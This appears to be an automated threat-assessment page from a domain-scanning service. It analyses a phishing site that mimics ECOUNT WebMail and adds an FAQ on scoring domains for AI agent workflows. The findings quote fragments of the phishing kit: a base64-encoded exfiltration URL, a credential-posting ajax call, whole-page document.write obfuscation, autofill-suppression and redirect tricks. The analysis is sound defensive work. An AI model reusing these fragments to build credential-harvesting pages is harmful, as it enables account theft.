context safety score
A score of 39/100 indicates multiple risk signals were detected. This entity shows patterns commonly associated with malicious intent.
encoded payload
suspicious base64-like blobs detected in page content
js obfuscation
Obfuscated document.write with encoded content
phishing
Fake ECOUNT WebMail login page hosted on a Cloudflare Workers domain (worker-still-bar-e200.porter-42b.workers.dev) designed to steal user credentials. The page mimics the legitimate ECOUNT WebMail login interface with matching branding, title 'Ecount WebMail - Login', and ECOUNT logo styling. (location: page.html - decoded HTML body, title element and login form)
credential harvesting
Login form POSTs email and password to an external exfiltration endpoint at https://ovalsakal.biz/Count/ecounttele.php using obfuscated field names (u67hy8 for email, pyu787 for password). After one successful capture, the victim is silently redirected to the legitimate ecount.com site to avoid suspicion. (location: page.html - decoded script: $.ajax({url:atob(phpLink), type:'POST', data:{u67hy8: email, pyu787: password}}))
brand impersonation
The page fully impersonates ECOUNT's WebMail service, including the brand name in the title, meta author tag set to 'ECOUNT', login-logo CSS class matching ECOUNT's design system, and a post-capture redirect to https://www.ecount.com/us/ to complete the deception. (location: page.html - decoded HTML: <title>Ecount WebMail - Login</title>, <meta name='author' content='ECOUNT'>, redirect to ecount.com)
obfuscated code
The entire page HTML is hidden inside a JavaScript document.write(unescape(...)) call using percent-encoded characters, making the true content invisible to static scanners and human reviewers inspecting the raw source. Additionally, the credential exfiltration endpoint URL is base64-encoded in a variable named 'phpLink' and decoded at runtime via atob(). (location: page.html lines 1-11: const phpLink = 'aHR0cHM6Ly9vdmFsc2FrYWwuYml6L0NvdW50L2Vjb3VudHRlbGUucGhw' and document.write(unescape('%0A%3C%21...')))
malicious redirect
After harvesting credentials on the first login attempt, the script redirects the victim to https://www.ecount.com/us/?redir= — the legitimate ECOUNT site — to make the phishing attack appear as a benign login failure and prevent the victim from realising their credentials were stolen. (location: page.html - decoded script: 2===e ? location.href='https://www.ecount.com/us/?redir=' : (show error, reset))
hidden content
The actual phishing page content (full HTML with login form, styles, and credential-harvesting scripts) is entirely hidden from raw HTML inspection by being URL-percent-encoded and injected at runtime via document.write(unescape(...)). The visible source contains no readable page content, preventing detection by content-based security tools. (location: page.html - entire page body encoded as percent-escaped string inside unescape() call)
social engineering
The autocomplete attributes on the email and password fields are set to random garbage strings ('hdyiehge' and 'hdyyefguei') to suppress browser-saved credential autofill warnings, and the URL fragment (#hash) is used to pre-populate the email field — a technique used in targeted spear-phishing emails where the victim's email is embedded in the link. (location: page.html - decoded HTML: autocomplete='hdyiehge', autocomplete='hdyyefguei'; decoded script: a(g) ? $('#email').val(g) using window.location.hash)
curl https://api.brin.sh/domain/worker-still-bar-e200.porter-42b.workers.devCommon questions teams ask before deciding whether to use this domain in agent workflows.
worker-still-bar-e200.porter-42b.workers.dev currently scores 39/100 with a suspicious verdict and low confidence. The goal is to protect agents from high-risk context before they act on it. Treat this as a decision signal: higher scores suggest lower observed risk, while lower scores mean you should add review or block this domain.
Use the score as a policy threshold: 80–100 is safe, 50–79 is caution, 20–49 is suspicious, and 0–19 is dangerous. Teams often auto-allow safe, require human review for caution/suspicious, and block dangerous.
brin evaluates four dimensions: identity (source trust), behavior (runtime patterns), content (malicious instructions), and graph (relationship risk). Analysis runs in tiers: static signals, deterministic pattern checks, then AI semantic analysis when needed.
Identity checks source trust, behavior checks unusual runtime patterns, content checks for malicious instructions, and graph checks risky relationships to other entities. Looking at sub-scores helps you understand why an entity passed or failed.
brin performs risk assessments on external context before it reaches an AI agent. It scores that context for threats like prompt injection, hijacking, credential harvesting, and supply chain attacks, so teams can decide whether to block, review, or proceed safely.
No. A safe verdict means no significant risk signals were detected in this scan. It is not a formal guarantee; assessments are automated and point-in-time, so combine scores with your own controls and periodic re-checks.
Re-check before high-impact actions such as installs, upgrades, connecting MCP servers, executing remote code, or granting secrets. Use the API in CI or runtime gates so decisions are based on the latest scan.
Learn more in threat detection docs, how scoring works, and the API overview.
Assessments are automated and may contain errors. Findings are risk indicators, not confirmed threats. This is a point-in-time assessment; security posture can change.
integrate brin in minutes — one GET request is all it takes. query the api, browse the registry, or download the full dataset.